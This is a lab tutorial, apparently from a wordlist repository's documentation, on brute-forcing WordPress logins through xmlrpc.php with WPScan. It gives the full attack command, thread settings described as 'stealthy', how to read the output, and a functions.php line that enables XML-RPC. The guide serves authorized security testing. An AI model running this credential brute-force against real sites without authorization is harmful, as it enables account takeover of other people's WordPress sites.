Skip to main content
Use these techniques only against systems you own or have explicit written authorization to test. Unauthorized access is illegal and unethical.

What is WPScan?

WPScan is an open-source WordPress security scanner. Beyond vulnerability detection, it supports credential brute-forcing through several attack modes — including xmlrpc, which sends authentication attempts directly to WordPress’s xmlrpc.php endpoint rather than the login page. The XML-RPC attack mode is well-suited for lab exercises because it bypasses many login-page protections and mirrors real-world attack techniques used against poorly secured WordPress installations.

Prerequisites

WPScan installed

Install via gem install wpscan or use the official Docker image. Confirm with wpscan --version.

Lab WordPress target

A WordPress instance running at http://TARGET/lab/ that you control or have authorization to test.

XML-RPC enabled

The target must have xmlrpc.php accessible. Verify with curl http://TARGET/lab/xmlrpc.php.

Wordlists downloaded

Both users.txt and passwords.txt from this repository must be present on your machine.

Running the attack

1

Verify XML-RPC is accessible

Before running WPScan, confirm that xmlrpc.php is reachable and returns the expected response:
curl -s http://TARGET/lab/xmlrpc.php
You should see a response like:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value><string>XML-RPC server accepts POST requests only.</string></value>
    </param>
  </params>
</methodResponse>
If you get a 404 or the file is not found, XML-RPC is disabled or the path is incorrect.
2

Run WPScan with XML-RPC brute-force

Execute the following command, replacing TARGET with your lab host:
wpscan --url http://TARGET/lab/ \
  --passwords passwords.txt \
  --usernames users.txt \
  --password-attack xmlrpc \
  --max-threads 50
WPScan will iterate through every combination of username and password using the XML-RPC interface.
3

Review the output

Watch the terminal for credential discoveries. WPScan prints a summary at the end of the run with any valid credentials found.

Flag reference

The base URL of the WordPress installation. WPScan automatically appends xmlrpc.php when using the xmlrpc attack mode. Include the full path if WordPress is installed in a subdirectory, as in http://TARGET/lab/.
Path to the password wordlist file. WPScan reads this file line by line and tests each entry. Use passwords.txt from this repository, which contains approximately 1,500 common passwords and pattern variations.
Path to the username wordlist file, or a comma-separated list of usernames. Use users.txt from this repository, which contains 1,200 common usernames for servers, web applications, and corporate environments.
Selects the XML-RPC attack mode. Instead of submitting credentials through wp-login.php, WPScan sends POST requests to xmlrpc.php using the wp.getUsersBlogs method. This is faster and avoids some login-page rate limits.
Number of concurrent threads WPScan uses for requests. The default is low; 50 provides a good balance between speed and avoiding target overload in a lab. Reduce this value if the server becomes unresponsive.

Interpreting the output

WPScan produces real-time output as it tests credentials. Key lines to watch for:
  • [+] Valid Combinations Found: — Indicates a successful match. WPScan prints the username and password pair below this line.
  • Trying username / password ... — Progress indicator showing the current attempt.
  • [i] No Valid Passwords Found. — The run completed without finding credentials.
At the end of a successful run, you will see output similar to: 
[+] Valid Combinations Found:
 | Username: admin, Password: password123
Redirect output to a file for later review: append | tee wpscan-results.txt to the command.

Adjusting thread count

The --max-threads value directly affects how aggressively WPScan hammers the target server.
ThreadsUse case
5–10Slow and stealthy; minimizes server load
20–30Balanced for most lab environments
50Fast; suitable for local or dedicated lab VMs
100+Risk of overwhelming the server or triggering timeouts
In shared lab environments, use --max-threads 10 or lower to avoid affecting other participants.

Troubleshooting

WPScan will report that the XML-RPC interface is disabled. To enable it in your lab WordPress instance, add the following filter to your theme’s functions.php:
add_filter('xmlrpc_enabled', '__return_true');
After saving, verify with curl http://TARGET/lab/xmlrpc.php — a response of “XML-RPC server accepts POST requests only.” confirms the endpoint is live.
If requests are timing out or returning HTTP 429, reduce --max-threads. You can also add --request-timeout 10 to give slower servers more time to respond.
Verify that the target URL is correct and the WordPress lab is running. Check that you are on the correct network (VPN, local network, etc.) and that the port is reachable with curl.
WPScan may display a warning about a missing API token for vulnerability data. This warning does not affect the brute-force functionality. You can obtain a free token at wpscan.com if needed.
Confirm that the target credentials are actually in the wordlists. Also verify that --url ends with a trailing slash and points to the correct WordPress installation path.

Build docs developers (and LLMs) love

Get started for freeTalk to us